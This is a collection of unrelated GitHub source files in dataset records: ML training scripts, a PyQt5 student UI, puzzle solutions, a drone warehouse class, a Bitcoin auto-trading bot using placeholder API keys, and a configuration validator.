args.num_classes, train_class_count, test_class_count,\n args.logdir, verbose=False)\n\nscheduler = torch.optim.lr_scheduler.StepLR(optimizer, step_size=args.lr_step, gamma=args.gamma)\n\nfor epoch in range(args.start_epoch, args.epochs):\n train_classifier(train_loader, model, criterion, optimizer, args, epoch, result_logger)\n 
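# evaluate on the held-out set after every epoch; the best top-1 checkpoint is saved below\n    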
acc1 = validate(val_loader, model, criterion, args, epoch, result_logger)\n\n scheduler.step()\n is_best = acc1 > best_acc1\n best_acc1 = max(acc1, best_acc1)\n\n result_logger.save_metrics()\n save_checkpoint({\n 'epoch': epoch + 1,\n 'arch': args.arch,\n 'state_dict': model.state_dict(),\n 'best_acc1': best_acc1,\n 'optimizer': optimizer.state_dict(),\n }, is_best, logdir=args.logdir)\n\nprint(best_acc1)\n","repo_name":"xinyuewangg/DGCMM","sub_path":"augment.py","file_name":"augment.py","file_ext":"py","file_size_in_byte":15773,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"82"} +{"seq_id":"20591285156","text":"from PyQt5 import QtCore, QtGui, QtWidgets\nfrom PyQt5.QtWidgets import QWidget\nfrom setting import WIDTH, HEIGHT\nimport os\n\n\nclass MainPage(QWidget):\n switch_window_to_log = QtCore.pyqtSignal()\n switch_window_to_preview = QtCore.pyqtSignal()\n switch_window_to_login = QtCore.pyqtSignal()\n\n def setupUi(self, MainForm):\n path = os.path.dirname(os.path.abspath(__file__))\n self.resize(WIDTH, HEIGHT)\n\n self.back_1 = QtWidgets.QLabel(MainForm)\n self.back_1.setGeometry(QtCore.QRect(0, 0, 300, 611))\n self.back_1.setStyleSheet(\"border:5px;\\n\"\n\"background-color:rgb(38, 55, 71)\\n\")\n\n self.back_2 = QtWidgets.QLabel(MainForm)\n self.back_2.setGeometry(QtCore.QRect(300, 0, 500, 600))\n self.back_2.setStyleSheet(\"background:rgb(255, 255, 255);\")\n\n self.stImg = QtWidgets.QLabel(MainForm)\n self.stImg.setGeometry(QtCore.QRect(40, 120, 220, 190))\n self.stImg.setStyleSheet(\"border-radius : 30%;\")\n self.stImg.setPixmap(QtGui.QPixmap(os.path.join(path, 'Img/inseong.png')))\n self.stImg.setScaledContents(True)\n\n\n self.stName = QtWidgets.QTextBrowser(MainForm)\n self.stName.setGeometry(QtCore.QRect(90, 390, 141, 41))\n self.stName.setStyleSheet(\"background-color:rgb(38, 55, 71);\\n\"\n\"color:rgb(255, 255, 255);\\n\"\n\"font: 14pt \\\"HY견고딕\\\";\\n\"\n\"border : 0;\")\n\n\n self.stNum = QtWidgets.QTextBrowser(MainForm)\n self.stNum.setGeometry(QtCore.QRect(60, 340, 221, 41))\n self.stNum.setStyleSheet(\"background-color:rgb(38, 55, 71);\\n\"\n\"color:rgb(255, 255, 255);\\n\"\n\"font: 14pt \\\"HY견고딕\\\";\\n\"\n\"border : 0;\")\n\n\n self.showLog = QtWidgets.QPushButton(MainForm)\n self.showLog.setGeometry(QtCore.QRect(10, 20, 131, 31))\n self.showLog.setStyleSheet(\"background-color : rgb(0, 123, 255);\\n\"\n\"border-style:outset;\\n\"\n\"border-radius: 10px;\\n\"\n\"color: rgb(255, 255, 255);\\n\"\n\"font: bold 10pt \\\"Hancom Gothic\\\";\\n\"\n\"\\n\"\n\"\\n\"\n\"\")\n self.showLog.clicked.connect(self.switch_log_page)\n\n self.logoutBtn = QtWidgets.QPushButton(MainForm)\n self.logoutBtn.setGeometry(QtCore.QRect(85, 430, 130, 30))\n self.logoutBtn.setStyleSheet(\"background-color : rgb(0, 123, 255);\\n\"\n \"border-style:outset;\\n\"\n \"border-radius: 10px;\\n\"\n \"color: rgb(255, 255, 255);\\n\"\n \"font: bold 10pt \\\"Hancom Gothic\\\";\\n\"\n \"\\n\"\n \"\\n\"\n \"\")\n self.logoutBtn.clicked.connect(self.switch_login_page)\n\n\n self.class_1 = QtWidgets.QPushButton(MainForm)\n self.class_1.setGeometry(QtCore.QRect(330, 20, 450, 90))\n self.class_1.setStyleSheet(\"background-color : rgb(255, 255, 255);\\n\"\n\"border-style:outset;\\n\"\n\"border-width:5px;\\n\"\n\"border-color:rgb(223, 223, 223);\\n\"\n\"border-radius: 10px;\\n\"\n\"font: bold 12pt \\\"Hancom Gothic\\\";\\n\"\n\"\")\n self.class_1.clicked.connect(self.switch_preview_page)\n\n\n self.class_2 = QtWidgets.QPushButton(MainForm)\n 
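# the five course cards share the same outline styling; only the geometry and the accent-bar colour differ\n        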
self.class_2.setGeometry(QtCore.QRect(330, 130, 450, 90))\n self.class_2.setStyleSheet(\"background-color : rgb(255, 255, 255);\\n\"\n\"border-style:outset;\\n\"\n\"border-width:5px;\\n\"\n\"border-color:rgb(223, 223, 223);\\n\"\n\"border-radius: 10px;\\n\"\n\"font: bold 12pt \\\"Hancom Gothic\\\";\\n\"\n\"\")\n self.class_2.clicked.connect(self.switch_preview_page)\n\n\n self.class_3 = QtWidgets.QPushButton(MainForm)\n self.class_3.setGeometry(QtCore.QRect(330, 240, 450, 90))\n self.class_3.setStyleSheet(\"background-color : rgb(255, 255, 255);\\n\"\n\"border-style:outset;\\n\"\n\"border-width:5px;\\n\"\n\"border-color:rgb(223, 223, 223);\\n\"\n\"border-radius: 10px;\\n\"\n\"font: bold 12pt \\\"Hancom Gothic\\\";\\n\"\n\"\")\n self.class_3.clicked.connect(self.switch_preview_page)\n\n self.class_4 = QtWidgets.QPushButton(MainForm)\n self.class_4.setGeometry(QtCore.QRect(330, 350, 450, 90))\n self.class_4.setStyleSheet(\"background-color : rgb(255, 255, 255);\\n\"\n\"border-style:outset;\\n\"\n\"border-width:5px;\\n\"\n\"border-color:rgb(223, 223, 223);\\n\"\n\"border-radius: 10px;\\n\"\n\"font: bold 12pt \\\"Hancom Gothic\\\";\\n\"\n\"\")\n self.class_4.clicked.connect(self.switch_preview_page)\n\n self.class_5 = QtWidgets.QPushButton(MainForm)\n self.class_5.setGeometry(QtCore.QRect(330, 460, 450, 90))\n self.class_5.setStyleSheet(\"background-color : rgb(255, 255, 255);\\n\"\n\"border-style:outset;\\n\"\n\"border-width:5px;\\n\"\n\"border-color:rgb(223, 223, 223);\\n\"\n\"border-radius: 10px;\\n\"\n\"font: bold 12pt \\\"Hancom Gothic\\\";\\n\"\n\"\")\n self.class_5.clicked.connect(self.switch_preview_page)\n\n\n self.label = QtWidgets.QLabel(MainForm)\n self.label.setGeometry(QtCore.QRect(340, 36, 5, 60))\n self.label.setStyleSheet(\"background-color:rgb(255, 181, 53);\")\n\n self.label_2 = QtWidgets.QLabel(MainForm)\n self.label_2.setGeometry(QtCore.QRect(340, 370, 5, 60))\n self.label_2.setStyleSheet(\"background-color:rgb(127, 42, 231)\")\n\n self.label_3 = QtWidgets.QLabel(MainForm)\n self.label_3.setGeometry(QtCore.QRect(340, 150, 5, 60))\n self.label_3.setStyleSheet(\"background-color:rgb(239, 9, 70)\")\n\n self.label_4 = QtWidgets.QLabel(MainForm)\n self.label_4.setGeometry(QtCore.QRect(340, 260, 5, 60))\n self.label_4.setStyleSheet(\"background-color:rgb(122, 255, 51)\")\n\n self.label_5 = QtWidgets.QLabel(MainForm)\n self.label_5.setGeometry(QtCore.QRect(340, 480, 5, 60))\n self.label_5.setStyleSheet(\"background-color:rgb(255, 241, 38)\")\n\n self.back_2.raise_()\n self.back_1.raise_()\n self.stImg.raise_()\n self.stNum.raise_()\n self.stName.raise_()\n self.showLog.raise_()\n self.logoutBtn.raise_()\n self.class_1.raise_()\n self.label.raise_()\n self.class_2.raise_()\n self.class_3.raise_()\n self.class_4.raise_()\n self.class_5.raise_()\n self.label_2.raise_()\n self.label_3.raise_()\n self.label_4.raise_()\n self.label_5.raise_()\n\n self.retranslateUi(MainForm)\n QtCore.QMetaObject.connectSlotsByName(MainForm)\n\n def retranslateUi(self, MainForm):\n _translate = QtCore.QCoreApplication.translate\n MainForm.setWindowTitle(_translate(\"MainForm\", \"Main Page\"))\n self.stName.setHtml(_translate(\"MainForm\", \"\\n\"\n\"\\n\"\n\"
<p align='center'>유인성 님</p>
\"))\n self.stNum.setHtml(_translate(\"MainForm\", \"\\n\"\n\"\\n\"\n\"
<p align='center'>1 2 1 8 1 6 8 9</p>
\"))\n\n self.showLog.setText(_translate(\"MainForm\", \"알림내역 보기\"))\n self.logoutBtn.setText(_translate(\"MainForm\", \"Log out\"))\n self.class_1.setText(_translate(\"MainForm\", \" 자바 기반 응용 프로그래밍 | A.M. 10:00\"))\n self.class_2.setText(_translate(\"MainForm\", \" 인터넷 프로그래밍 | P.M. 6:00\"))\n self.class_3.setText(_translate(\"MainForm\", \" 초급 스페인어 | A.M. 9:50\"))\n self.class_4.setText(_translate(\"MainForm\", \" 어셈블리어 | A.M. 11:00\"))\n self.class_5.setText(_translate(\"MainForm\", \" 댄스 스포츠 | A.M. 10:00\"))\n\n def switch_log_page(self):\n self.switch_window_to_log.emit()\n\n def switch_preview_page(self):\n self.switch_window_to_preview.emit()\n\n def switch_login_page(self):\n self.switch_window_to_login.emit()\n","repo_name":"Ro4z/POOC","sub_path":"src/page/MainPage.py","file_name":"MainPage.py","file_ext":"py","file_size_in_byte":8413,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"} +{"seq_id":"1685981295","text":"import os\nimport argparse\nimport numpy as np\nimport tensorflow as tf\n\n# standard resnet block\ndef residual_block(x, filters, projection):\n x_skip = x \n\n # layer 1\n if projection:\n x = tf.keras.layers.Conv2D(filters, (3, 3), (2,2), padding='same', kernel_initializer='he_normal')(x)\n else:\n x = tf.keras.layers.Conv2D(filters, (3, 3), (1,1), padding='same', kernel_initializer='he_normal')(x)\n x = tf.keras.layers.BatchNormalization(axis=3)(x)\n x = tf.keras.layers.Activation('relu')(x)\n\n # layer 2\n x = tf.keras.layers.Conv2D(filters, (3, 3), (1,1), padding='same', kernel_initializer='he_normal')(x)\n x = tf.keras.layers.BatchNormalization(axis=3)(x)\n\n # addition\n if projection:\n x_skip = tf.keras.layers.Conv2D(filters, (1, 1), (2,2), padding='valid', kernel_initializer='he_normal')(x_skip)\n x = tf.keras.layers.Add()([x, x_skip])\n x = tf.keras.layers.Activation('relu')(x)\n\n return x\n\n# configured for resnet-20\ndef resnet20(shape_in, classes):\n # input and initial convolution\n x_in = tf.keras.layers.Input(shape_in)\n x = tf.keras.layers.Conv2D(16, (3, 3), (1,1), padding='same', kernel_initializer='he_normal')(x_in)\n x = tf.keras.layers.BatchNormalization(axis=3)(x)\n x = tf.keras.layers.Activation('relu')(x)\n\n # residual blocks\n filters = [16, 32, 64]\n for i in range(3):\n for j in range(3):\n if i > 0 and j == 0:\n x = residual_block(x, filters[i], projection=True)\n else:\n x = residual_block(x, filters[i], projection=False)\n\n # final dense layer and model \n x = tf.keras.layers.GlobalAveragePooling2D()(x)\n x = tf.keras.layers.Flatten()(x)\n x_out = tf.keras.layers.Dense(classes, kernel_initializer='he_normal')(x)\n model = tf.keras.models.Model(x_in, x_out, name='ResNet20')\n\n return model\n\nif __name__ == \"__main__\":\n # parse args\n parser = argparse.ArgumentParser()\n parser.add_argument('--model', type=str, help='Specify model to use', choices=['vgg16', 'resnet20', 'convnet'], required=True)\n parser.add_argument('--dataset', type=str, help='Specify medmnist dataset to use', choices=['pathmnist', 'octmnist', 'tissuemnist'], required=True)\n parser.add_argument('--gpu', type=int, help='Specify gpu index to use', required=False)\n args = parser.parse_args()\n\n # set gpu index if specified \n if args.gpu is not None:\n os.environ['CUDA_VISIBLE_DEVICES'] = f'{args.gpu}'\n os.environ['TF_FORCE_GPU_ALLOW_GROWTH'] = 'true'\n \n # create model dir if not yet created\n if not os.path.exists(os.path.join(os.getcwd(), 'models')):\n os.makedirs(os.path.join(os.getcwd(), 'models'))\n\n # load 
dataset\n dataset = np.load(f'{args.dataset}.npz')\n dataset = dict(dataset)\n\n # add axis if greyscale\n # define input_shape\n if len(dataset['train_images'].shape) == 3:\n input_shape = (28, 28, 1)\n dataset['train_images'] = dataset['train_images'][..., np.newaxis]\n dataset['val_images'] = dataset['val_images'][..., np.newaxis]\n dataset['test_images'] = dataset['test_images'][..., np.newaxis]\n else:\n input_shape = (28, 28, 3)\n\n # define classes\n if args.dataset == 'pathmnist':\n classes = 9\n elif args.dataset == 'octmnist':\n classes = 4\n elif args.dataset == 'tissuemnist':\n classes = 8\n \n # compile model\n if args.model == 'resnet20': \n model = resnet20(input_shape, classes)\n elif args.model == 'vgg16': \n model = tf.keras.Sequential()\n model.add(tf.keras.layers.Input(input_shape))\n for idx, filter in enumerate([64, 128, 256, 512, 512]):\n model.add(tf.keras.layers.Conv2D(filter, (3,3), (1,1), padding='same', kernel_initializer='he_normal', activation='relu'))\n model.add(tf.keras.layers.BatchNormalization())\n model.add(tf.keras.layers.Dropout(0.25))\n if idx > 1:\n model.add(tf.keras.layers.Conv2D(filter, (3,3), (1,1), padding='same', kernel_initializer='he_normal', activation='relu'))\n model.add(tf.keras.layers.BatchNormalization())\n model.add(tf.keras.layers.Dropout(0.25))\n model.add(tf.keras.layers.Conv2D(filter, (3,3), (1,1), padding='same', kernel_initializer='he_normal', activation='relu'))\n model.add(tf.keras.layers.BatchNormalization())\n if idx < 4:\n model.add(tf.keras.layers.MaxPool2D((2,2),(2,2)))\n else:\n model.add(tf.keras.layers.Dropout(0.25))\n model.add(tf.keras.layers.Flatten())\n model.add(tf.keras.layers.Dense(512, activation='relu', kernel_initializer='he_normal'))\n model.add(tf.keras.layers.BatchNormalization())\n model.add(tf.keras.layers.Dropout(0.25))\n model.add(tf.keras.layers.Dense(classes, activation=None, kernel_initializer='he_normal'))\n elif args.model == 'convnet': \n model = tf.keras.Sequential([\n tf.keras.layers.Input(input_shape),\n \n tf.keras.layers.Conv2D(32, (3,3), (1,1), padding='same', kernel_initializer='he_normal', activation='relu'),\n tf.keras.layers.Conv2D(32, (3,3), (1,1), padding='same', kernel_initializer='he_normal', activation='relu'),\n tf.keras.layers.MaxPool2D(pool_size=(2,2)),\n\n tf.keras.layers.Conv2D(64, (3,3), (1,1), padding='same', kernel_initializer='he_normal', activation='relu'),\n tf.keras.layers.Conv2D(64, (3,3), (1,1), padding='same', kernel_initializer='he_normal', activation='relu'),\n tf.keras.layers.MaxPool2D(pool_size=(2,2)),\n\n tf.keras.layers.Conv2D(128, (3,3), (1,1), padding='same', kernel_initializer='he_normal', activation='relu'),\n tf.keras.layers.Conv2D(128, (3,3), (1,1), padding='same', kernel_initializer='he_normal', activation='relu'),\n tf.keras.layers.MaxPool2D(pool_size=(2,2)),\n\n tf.keras.layers.Flatten(),\n tf.keras.layers.Dropout(0.25),\n tf.keras.layers.Dense(1024, kernel_initializer='he_normal', activation='relu'),\n tf.keras.layers.Dropout(0.25),\n tf.keras.layers.Dense(512, kernel_initializer='he_normal', activation='relu'),\n tf.keras.layers.Dropout(0.25),\n tf.keras.layers.Dense(classes, kernel_initializer='he_normal', activation=None),\n ])\n optim = tf.keras.optimizers.Adam(lr=0.001)\n loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True)\n model.compile(optimizer=optim, loss=loss, metrics=['accuracy'])\n model.summary()\n\n # train model\n lr_scheduler = tf.keras.callbacks.LearningRateScheduler(\n lambda epoch, lr: lr*0.1 if epoch == 50 or 
epoch == 75 else lr\n    )\n    tensorboard = tf.keras.callbacks.TensorBoard(\n        log_dir=os.path.join(os.getcwd(), 'logs', f'{args.dataset}_{args.model}'),\n    )\n    # checkpoint = tf.keras.callbacks.ModelCheckpoint(\n    #     os.path.join(os.getcwd(), 'models', f'model_{args.dataset}_{args.model}.h5'),\n    #     monitor='val_accuracy',\n    #     verbose=1,\n    #     save_best_only=True,\n    #     save_weights_only=False,\n    #     mode='max',\n    # )\n    model.fit(\n        dataset['train_images']/255.0,\n        dataset['train_labels'],\n        batch_size=128,\n        epochs=100,\n        verbose=1,\n        callbacks=[lr_scheduler, tensorboard],\n        validation_data=(dataset['val_images']/255.0, dataset['val_labels']),\n        shuffle=True,\n    )\n    model.save(os.path.join(os.getcwd(), 'models', f'model_{args.dataset}_{args.model}.h5'))\n\n    # load and eval best model\n    model = tf.keras.models.load_model(\n        os.path.join(os.getcwd(), 'models', f'model_{args.dataset}_{args.model}.h5')\n    )\n    score = model.evaluate(\n        dataset['test_images']/255.0,\n        dataset['test_labels'],\n        batch_size=128,\n        verbose=1,\n    )\n    print(f\"Test loss: {score[0]} - Test acc: {score[1]}\")\n    np.save(os.path.join(os.getcwd(), 'logs', f'{args.dataset}_{args.model}', 'score.npy'), score)","repo_name":"rajfly/MedMNIST","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":8077,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"}
{"seq_id":"73426164427","text":"from collections import Counter\r\n\r\ndef main():\r\n    lines = []\r\n    with open('temp.txt') as f:\r\n        lines = f.readlines()\r\n\r\n    lines = [s.strip() for s in lines]\r\n\r\n    length = len(lines[0])\r\n    part1 = \"\"\r\n    for i in range(length):\r\n        string = \"\"\r\n        for line in lines:\r\n            string += line[i]\r\n\r\n        counts = Counter(string)\r\n        part1 += max(counts, key=counts.get)\r\n\r\n    print(f\"Part 1: {part1}\")\r\n\r\n    part2 = \"\"\r\n    for i in range(length):\r\n        string = \"\"\r\n        for line in lines:\r\n            string += line[i]\r\n\r\n        counts = Counter(string)\r\n        part2 += min(counts, key=counts.get)\r\n\r\n    print(f\"Part 2: {part2}\")\r\n\r\n\r\nif __name__ == \"__main__\":\r\n    main()","repo_name":"EGTB724/AdventOfCode2016","sub_path":"Day6.py","file_name":"Day6.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"}
{"seq_id":"39825987494","text":"import collections\nimport heapq\nclass Solution:\n    def bestTaskSequence(self, tasks, intervals):\n        mp = collections.defaultdict(int)\n        for i in tasks:\n            mp[i] += 1\n        pq = []\n        res = []\n        for i in mp.keys():\n            tp = [-mp[i], i]\n            heapq.heappush(pq, tp)\n        while len(pq):\n            length = intervals\n            tmppq = []\n            while length > 0 and len(pq):\n                length -= 1\n                tp = heapq.heappop(pq)\n                res.append(tp[1])\n                tp[0] += 1\n                if tp[0] == 0:\n                    continue\n                tmppq.append(tp)\n            while len(tmppq):\n                heapq.heappush(pq, tmppq.pop(0))\n        return res\nobj = Solution()\ntasks = ['1', '2', '3', '2', '1', '1', '4', '3', '3', '1']\nintervals = 3\nprint(obj.bestTaskSequence(tasks, intervals))","repo_name":"KJSui/leetcode-2020","sub_path":"cruise-interview.py","file_name":"cruise-interview.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"}
{"seq_id":"15786127310","text":"from drone import Drone\nfrom order import Order\nfrom map import Map\n\n\nclass Warehouse:\n    def __init__(self, name: str, drone_number: int, neighbourhood: str):\n        self.name = name\n        self.drone_number = drone_number\n        self.neighbourhood = neighbourhood\n\n        
# The list of drones of the warehouse, created by a method:\n        self.drone_list = self.create_drones(drone_number)\n        # The list of orders coming in:\n        self.orders = []\n\n        # Objects needed\n        self.map = Map(self.neighbourhood, [])\n\n    # properties and setters\n\n    # For name variable: Must be a str, can be seen and edited\n    @property\n    def name(self):\n        return self.__name\n\n    @name.setter\n    def name(self, name):\n        if type(name) != str:\n            raise TypeError(\"Name must be a str\")\n        else:\n            self.__name = name\n\n    # For drone_number: must be an int (the number of drones), can be seen and edited\n\n    @property\n    def drone_number(self):\n        return self.__drone_number\n\n    @drone_number.setter\n    def drone_number(self, drone_number):\n        if type(drone_number) != int:\n            raise TypeError(\"drone_number must be an int\")\n        else:\n            self.__drone_number = drone_number\n\n    # For neighbourhood: Str, can be seen and edited\n\n    @property\n    def neighbourhood(self):\n        return self.__neighbourhood\n\n    @neighbourhood.setter\n    def neighbourhood(self, neighbourhood):\n        if type(neighbourhood) != str:\n            raise TypeError(\"Neighbourhood must be a str\")\n        else:\n            self.__neighbourhood = neighbourhood\n\n    # METHODS OF THE WAREHOUSE CLASS\n\n    def create_drones(self, drone_number):\n        drone_list = []\n        for i in range(drone_number):\n            drone_list.append(Drone(f\"drone{i}\"))\n        return drone_list\n\n    # Inserts an order into the list of orders, keeping the list sorted by priority\n    def insert_order_in_list(self, order: Order):\n        # If the list is not empty we can add normally\n        if len(self.orders) != 0:\n            insert_index = len(self.orders)\n        # If it is empty, we add at index 0: Add the first element\n        else:\n            insert_index = 0\n        # We check every element in the list of orders, starting at the end: while the element to the left has a lower\n        # priority than the one we are inserting, we move the insertion point one to the left. We do that until there\n        # are no lower-priority orders left\n        for i in range(len(self.orders)):\n            if self.orders[insert_index - 1].priority < order.priority:\n                insert_index -= 1\n        # When we finish changing the index, we insert the order into the list\n        self.orders.insert(insert_index, order)\n
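\n    # Illustrative usage sketch (added; assumes Order objects expose a numeric\n    # .priority attribute, as the comparison above requires). Inserting orders\n    # with priorities 1, 3, 2 keeps self.orders sorted from high to low:\n    #   warehouse.insert_order_in_list(order_p1)\n    #   warehouse.insert_order_in_list(order_p3)\n    #   warehouse.insert_order_in_list(order_p2)\n    #   [o.priority for o in warehouse.orders]  # -> [3, 2, 1]\n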
\n    # Returns a tuple with a drone id suited for the address specified and the distance to that address\n    def pick_drone(self, order_address: str):\n        # Choose the drone for the order_address\n        # The first available one is chosen by looking at the list from start to finish\n        # (a drone needs enough power for the round trip, hence the factor of 2)\n        for i in range(len(self.drone_list)):\n            if self.drone_list[i].power >= 2 * self.map.compute_distance(self.name, order_address):\n                return_tuple = (self.drone_list[i].id, self.map.compute_distance(self.name, order_address))\n                return return_tuple\n\n        # Else we charge the first drone to its max power\n        self.drone_list[0].power = 100\n        # We create the return tuple for the freshly charged drone and return it\n        return_tuple = (self.drone_list[0].id, self.map.compute_distance(self.name, order_address))\n\n        return return_tuple\n\n    def process_order(self, order):\n        self.orders.append(order)\n        drone_id = self.pick_drone(order.address)[0]\n        for drone in self.drone_list:\n            if drone.id == drone_id:\n                drone.status = \"busy\"\n                drone.order = order\n                break\n        else:\n            print(\"No drone with the id required\")\n","repo_name":"Albrtito/UC3M_Programming_Exercises","sub_path":"Final exam preparation/final-exams-cs/19-20 January/warehouse.py","file_name":"warehouse.py","file_ext":"py","file_size_in_byte":3940,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"}
{"seq_id":"20770014045","text":"import time\nimport pyupbit\nimport datetime\nimport requests\n\naccess = \"your access\" # API\nsecret = \"your secret\" # API\nmyToken = \"your token\" # slack token\n\ndef post_message(token, channel, text):\n    \"\"\"Send a Slack message\"\"\"\n    response = requests.post(\"https://slack.com/api/chat.postMessage\",\n        headers={\"Authorization\": \"Bearer \" + token},\n        data={\"channel\": channel, \"text\": text}\n    )\n\ndef get_target_price(ticker, k):\n    \"\"\"Get the target buy price using the volatility breakout strategy\"\"\"\n    df = pyupbit.get_ohlcv(ticker, interval=\"day\", count=2)\n    target_price = df.iloc[0]['close'] + (df.iloc[0]['high'] - df.iloc[0]['low']) * k\n    return target_price\n\ndef get_start_time(ticker):\n    \"\"\"Get the start time of the current daily candle\"\"\"\n    df = pyupbit.get_ohlcv(ticker, interval=\"day\", count=1)\n    start_time = df.index[0]\n    return start_time\n
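\n# Worked example (added; numbers are hypothetical, purely for illustration):\n# if yesterday's daily candle closed at 50_000_000 KRW with high 51_200_000\n# and low 49_200_000, then with k = 0.5 the breakout trigger above is\n#   50_000_000 + (51_200_000 - 49_200_000) * 0.5 == 51_000_000 KRW,\n# and a buy is only attempted once the current price crosses that level.\n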
\ndef get_ma5(ticker):\n    \"\"\"Get the 5-day moving average\"\"\"\n    df = pyupbit.get_ohlcv(ticker, interval=\"day\", count=5)\n    ma5 = df['close'].rolling(5).mean().iloc[-1]\n    return ma5\n\ndef get_balance(ticker):\n    \"\"\"Get the balance for a currency\"\"\"\n    balances = upbit.get_balances()\n    for b in balances:\n        if b['currency'] == ticker:\n            if b['balance'] is not None:\n                return float(b['balance'])\n            else:\n                return 0\n    return 0\n\ndef get_current_price(ticker):\n    \"\"\"Get the current (ask) price\"\"\"\n    return pyupbit.get_orderbook(tickers=ticker)[0][\"orderbook_units\"][0][\"ask_price\"]\n\ndef get_buying_ratio(ticker, risk):\n    \"\"\"Compute the fraction of the balance to spend\"\"\"\n    df = pyupbit.get_ohlcv(ticker, interval=\"day\", count=2)\n    range_ratio = (df.iloc[0]['high'] - df.iloc[0]['low'])/df.iloc[0]['close']\n    buying_ratio = risk/range_ratio\n    ratio = min([1, round(buying_ratio, 2)])\n    return ratio\n\n# Log in\nupbit = pyupbit.Upbit(access, secret)\nprint(\"autotrade start\") # TODO: post a start notification each morning when the date changes\npost_message(myToken,\"#coin\", \"Autotrade start\")\n\n# Initialize state\nbuy_result, daily_msg, sell_result = None, None, None\n\n# Start auto-trading\nwhile True:\n    try:\n        now = datetime.datetime.now()\n        start_time = get_start_time(\"KRW-BTC\") # 9:00\n        end_time = start_time + datetime.timedelta(days=1) # 9:00 + 1 day\n        ratio = get_buying_ratio(\"KRW-BTC\", 0.02)\n\n        if start_time < now < end_time - datetime.timedelta(seconds=60):\n            target_price = get_target_price(\"KRW-BTC\", 0.5)\n            ma5 = get_ma5(\"KRW-BTC\")\n            current_price = get_current_price(\"KRW-BTC\")\n            daily_msg, sell_result = None, None # reset these for the new trading day\n            if target_price < current_price and ma5 < current_price:\n                budget = get_balance(\"KRW\") * ratio # spend only balance * buying ratio (the purchase budget)\n                # only when the budget is above 5,000 KRW and buy_result is None or an error\n                if budget > 5000 and (buy_result is None or 'error' in buy_result):\n                    buy_result = upbit.buy_market_order(\"KRW-BTC\", budget*0.9995)\n                    post_message(myToken, \"#coin\", \"BTC buy : \" +str(buy_result))\n\n        else:\n            btc = get_balance(\"BTC\")\n            buy_result = None # if the buy errored, buy_result must be reset once the next day starts; it sits in the sell branch because a failed buy leaves nothing to sell\n            # only when the BTC holding is worth more than about 5,000 KRW and sell_result is None or an error\n            if btc > 0.00008 and (sell_result is None or 'error' in sell_result):\n                sell_result = upbit.sell_market_order(\"KRW-BTC\", btc)\n                post_message(myToken, \"#coin\", \"BTC sell : \" + str(sell_result))\n        # notification that the program is still running\n        if daily_msg is None:\n            post_message(myToken, \"#coin\", \"program is running\")\n            daily_msg = \"On\"\n        time.sleep(1)\n    except Exception as e:\n        print(e)\n        post_message(myToken, \"#coin\", e)\n        time.sleep(1)\n","repo_name":"duhyunkang/AutoTrade","sub_path":"BitcoinAutoTrading_git.py","file_name":"BitcoinAutoTrading_git.py","file_ext":"py","file_size_in_byte":4117,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"}
{"seq_id":"22270178628","text":"\"\"\"!\n\\file config_validation.py\n\n\\brief Validate that the required parameters are present in the configuration file\n\"\"\"\n\nimport warnings\nfrom . 
import structures as struc\nfrom pathlib import Path\n\n\ndef check_parameters_are_present(configuration, is_image):\n    \"\"\"!\n    \\brief Checks if global parameters are present\n\n    \\param configuration Parsed configuration\n    \\param is_image Set to True if the input for phantom generation is an image file\n\n    \\note Raises an exception if there is any error\n    \"\"\"\n\n    error_msg = \"\"\n\n    if not is_image:\n        # Get size information from input image\n        if \"rows_y\" not in configuration:\n            error_msg = error_msg + \"Parameter \\\"rows_y\\\" is missing.\\r\\n\"\n\n        if \"cols_x\" not in configuration:\n            error_msg = error_msg + \"Parameter \\\"cols_x\\\" is missing.\\r\\n\"\n\n    if \"distribution\" not in configuration:\n        error_msg = error_msg + \"Parameter \\\"distribution\\\" is missing.\\r\\n\"\n\n    if \"perc_of_scatterers\" not in configuration:\n        error_msg = error_msg + \"Parameter \\\"perc_of_scatterers\\\" is missing.\\r\\n\"\n\n    if \"phantom_format\" not in configuration:\n        error_msg = error_msg + \"Parameter \\\"phantom_format\\\" is missing.\\r\\n\"\n    else:\n        if configuration[\"phantom_format\"] == \"k_wave\":\n            if \"sound_speed_c0_m_per_s\" not in configuration:\n                error_msg = error_msg + \"Parameter \\\"sound_speed_c0_m_per_s\\\" is missing.\\r\\n\"\n            if \"density_rho0_kg_per_m3\" not in configuration:\n                error_msg = error_msg + \"Parameter \\\"density_rho0_kg_per_m3\\\" is missing.\\r\\n\"\n\n    if error_msg:\n        raise Exception(\"One or more parameters are missing in the configuration file.\\r\\n\" + error_msg)\n\n\ndef validate_distribution(distribution):\n    \"\"\"!\n    \\brief Checks if a valid statistical distribution was specified\n\n    \\param distribution String containing the desired statistical distribution\n\n    \\return An empty string if no error is found; an error string otherwise\n    \"\"\"\n\n    error_msg = \"\"\n\n    supported_distributions = [\"uniform\", \"gaussian\", \"rayleigh\"]\n\n    if distribution not in supported_distributions:\n        error_msg = 'The distribution ' + distribution + \" is not supported.\\r\\n\"\n        error_msg = error_msg + \"Supported distributions are:\"\n        for dist in supported_distributions:\n            error_msg = error_msg + \" \" + dist\n\n        error_msg = error_msg + \".\\r\\n\"\n\n    return error_msg\n\n\ndef validate_perc_of_scat(perc_of_scatterers):\n    \"\"\"!\n    \\brief Checks if the percentage of scatterer points in the matrix is valid\n\n    \\param perc_of_scatterers Percentage of the area that will be filled with scatterers [0%, 100%]\n\n    \\return An empty string if no error is found; an error string otherwise\n    \"\"\"\n\n    error_msg = \"\"\n\n    if perc_of_scatterers <= 0 or perc_of_scatterers > 100:\n        error_msg = error_msg + \"Percentage of scatterers should be > 0 and <= 100 %\\r\\n\"\n    elif perc_of_scatterers == 100:\n        warnings.warn_explicit(\"Percentage of scatterers is set to 100 %. Please check your configuration.\\r\\n\", UserWarning, \"\", 0)\n\n    return error_msg\n
